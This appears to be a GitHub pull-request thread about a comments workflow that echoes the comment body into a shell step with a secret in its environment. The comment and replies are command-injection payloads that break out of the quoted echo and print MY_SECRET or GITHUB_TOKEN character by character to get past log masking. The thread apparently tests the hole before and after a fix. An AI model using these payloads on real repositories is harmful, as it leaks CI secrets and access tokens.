.github/workflows/comment_action.yml

```diff
@@ -14,3 +14,5 @@ jobs:
                 MY_SECRET: ${{ secrets.MY_SECRET }}
               run: |
                 echo "${{ github.event.comment.body }}"
+
```

Comment:
";echo "this is before pr was merged";for (( i=0; i<${#MY_SECRET}; i++ )); do echo "${MY_SECRET:$i:1}"; done; echo"

Reply:
";echo "this is after pr was merged";for (( i=0; i<${#MY_SECRET}; i++ )); do echo "${MY_SECRET:$i:1}"; done; echo"

Reply:
";echo "this is after fix pr was merged";for (( i=0; i<${#MY_SECRET}; i++ )); do echo "${MY_SECRET:$i:1}"; done; echo"

Reply:
";echo "this is after fix pr was merged";for (( i=0; i<${#GITHUB_TOKEN}; i++ )); do echo "${GITHUB_TOKEN:$i:1}"; done; echo"

Reply:
";echo "this is after fix pr was merged";echo ${{secrets.GITHUB_TOKEN}}; done; echo"

Reply:
";echo "this is after fix pr was merged";echo ${{secrets.GITHUB_TOKEN}}; echo"

Reply:
";echo "this is after pr was merged";for (( i=0; i<${#MY_SECRET}; i++ )); do echo "${MY_SECRET:$i:1}"; done; echo"